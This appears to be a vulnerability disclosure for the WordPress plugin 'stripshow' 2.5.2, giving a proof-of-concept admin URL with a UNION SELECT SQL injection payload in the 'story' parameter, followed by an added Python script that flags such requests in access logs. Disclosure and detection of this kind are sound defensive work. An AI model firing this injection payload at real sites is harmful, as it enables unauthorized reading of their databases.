Wp Plugin Stripshow

Plugin Details

Plugin Name: wp-plugin : stripshow
Affected Version : 2.5.2 (and most probably lower versions, if any)
Vulnerability : Injection
Minimum Level of Access Required : Administrator
CVE Number :
Identified by : Anantshri
WPScan Reference URL

Disclosure Timeline

Technical Details

http://localhost/wp-admin/admin.php?page=stripshow-storylines&action=edit&story=2%20union%20select%201,@@version,user(),4,5

Here the “story” parameter is susceptible to injection. However, the risk is limited, as this is only possible for administrators.
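A detection check for the request shape shown above, added here as an example and not part of the original advisory: it scans web-server access-log lines for requests to the `stripshow-storylines` admin page whose `story` value is not a plain integer. The combined log format, the sample log lines, the function name and the assumption that a legitimate `story` value is a numeric ID are all assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Client IP and request target from a combined-format access-log line (assumed format).
REQUEST_RE = re.compile(r'^(?P<ip>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

PLUGIN_PAGE = "stripshow-storylines"  # value of ?page= in the advisory URL


def suspicious_story_requests(log_lines):
    """Return (client_ip, decoded_story_value) for each request to the
    stripshow storylines admin page whose `story` is not a plain integer."""
    hits = []
    for line in log_lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue
        url = urlsplit(m.group("target"))
        if not url.path.endswith("/wp-admin/admin.php"):
            continue
        # parse_qs percent-decodes once; a double-encoded value still
        # contains '%' and is therefore flagged as non-numeric too.
        params = parse_qs(url.query, keep_blank_values=True)
        if PLUGIN_PAGE not in params.get("page", []):
            continue
        for value in params.get("story", []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((m.group("ip"), value))
    return hits


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - admin [10/Oct/2023:13:55:36 +0000] "GET /wp-admin/admin.php'
    '?page=stripshow-storylines&action=edit&story=2 HTTP/1.1" 200 5120',
    '192.0.2.44 - admin [10/Oct/2023:13:56:02 +0000] "GET /wp-admin/admin.php'
    '?page=stripshow-storylines&action=edit'
    '&story=2%20union%20select%201,@@version,user(),4,5 HTTP/1.1" 200 5342',
    '192.0.2.10 - - [10/Oct/2023:13:57:11 +0000] "GET /wp-admin/admin.php'
    '?page=other-plugin&story=abc HTTP/1.1" 200 100',
]

if __name__ == "__main__":
    for ip, value in suspicious_story_requests(SAMPLE_LOG):
        print(f"{ip}: non-numeric story value {value!r}")
```

Because the vulnerable page requires an administrator session, a hit from this check also points to an administrator account or session that should be reviewed.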